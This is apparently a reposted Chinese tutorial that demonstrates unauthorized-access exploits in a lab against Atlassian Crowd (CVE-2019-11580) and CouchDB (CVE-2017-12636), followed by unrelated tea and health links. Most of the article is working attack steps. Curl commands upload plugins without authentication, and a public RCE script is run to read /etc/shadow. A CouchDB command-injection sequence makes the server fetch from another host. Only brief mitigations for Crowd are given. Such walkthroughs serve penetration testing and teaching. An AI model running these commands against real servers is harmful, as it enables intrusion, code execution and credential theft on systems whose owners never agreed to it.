Atlassian Crowd 未授权访问漏洞漏洞简介以及危害 Atlassian Crowd和Atlassian Crowd Data Center都是澳大利亚Atlassian公司的产品 。Atlassian Crowd是一套基于Web的单点登录系统 。该系统为多用户、网络应用程序和目录服务器提供验证、授权等功能 。Atlassian Crowd Data Center是Crowd的集群部署版 。Atlassian Crowd和Crowd Data Center在其某些发行版本中错误地启用了pdkinstall开发插件,使其存在安全漏洞 。攻击者利用该漏洞可在未授权访问的情况下对Atlassian Crowd和Crowd Data Center安装任意的恶意插件,执行任意代码/命令,从而获得服务器权限 。
漏洞利用环境介绍目标靶机:Centosip地址:192.168.18.138连接工具:Xshell
环境搭建wget https://product-downloads.atlassian.com/software/crowd/downloads/atlassian-crowd-3.4.3.zipunzip atlassian-crowd-3.4.3.zip
文章插图
cd atlassian-crowd-3.4.3vim crowd-webApp/WEB-INF/classes/crowd-init.properties
文章插图
./start_crowd.sh
文章插图
访问http://192.168.18.138:8095 点击Set up Crowd
文章插图
可以在这里申请试用30天https://my.atlassian.com/products/index 并填写license进行下一步安装,直到安装完成 。
文章插图
未授权访问测试进行上传一个标准的插件,来自atlassian-bundled-plugins中的applinks-plugin-5.4.12.jar
curl --form "file_cdl=@applinks-plugin-5.4.12.jar" http://192.168.18.138:8095/crowd/admin/uploadplugin.action -v
成功上传文章插图
Atlassian Crowd RCE漏洞利用脚本github地址:https://github.com/jas502n/CVE-2019-11580
git clone https://github.com/jas502n/CVE-2019-11580cd CVE-2019-11580/python CVE-2019-11580.py http://192.168.18.138:8095curl http://192.168.18.138:8095/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow
文章插图
防御手段-设置访问/crowd/admin/uploadplugin.action的源ip 。-升级最新版本(3.5.0以上) 。
CouchDB 未授权访问漏洞漏洞简介以及危害 Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库" 。它是一个使用JSON作为存储格式,JAVAScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库 。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序),默认会在5984端口开放Restful的API接口,如果使用SSL的话就会监听在6984端口,用于数据库的管理功能 。其HTTP Server默认开启时没有进行验证,而且绑定在0.0.0.0,所有用户均可通过API访问导致未授权访问 。 在官方配置文档中对HTTP Server的配置有WWW-Authenticate:Set this option to trigger basic-auth popup on unauthorized requests,但是很多用户都没有这么配置,导致漏洞产生 。
漏洞利用环境介绍
目标靶机:Kaliip地址:192.168.18.129连接工具:Xshell
环境搭建mkdir couchdbwget https://raw.githubusercontent.com/vulhub/vulhub/master/couchdb/CVE-2017-12636/docker-compose.yml
文章插图
docker-compose up -d
文章插图
未授权访问测试
curl http://192.168.18.129:5984curl http://192.168.18.129:5984/_config
文章插图
文章插图
任意命令执行本机python运行http服务
python -m SimpleHTTPServer 9999
文章插图
#依次执行如下命令curl -X PUT 'http://192.168.18.129:5984/_config/query_servers/cmd' -d '"curl http://192.168.18.138:9999/test.php"'curl -X PUT 'http://192.168.18.129:5984/vultest'curl -X PUT 'http://192.168.18.129:5984/vultest/vul' -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}'curl -X POST 'http://192.168.18.129:5984/vultest/_temp_view?limit=11' -d '{"language":"cmd","map":""}' -H 'Content-Type: application/json'
推荐阅读
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- 喝白沙绿茶有什么功效,夏天喝什么茶叶最好
- 柿子怎么催熟最快?
- 中国十大名茶最新排名是怎样的?
- 世界上最敏捷的动物 世界上最活泼的动物
- 金瓜贡茶怎么泡最好喝,狗脑贡茶怎么泡
- 世界上最大的耳朵屎 世界上最大的耳朵的人图片
- 大猩猩体重最重有多少斤 猩猩最大的有多少斤
- 老人冬天心血管疾病高发 该如何预防
- 冬季男性隐忧大 专家:冬季灭男科疾病最高效
- 寒性体质喝什么茶最好,紫罗兰花茶什么人不能喝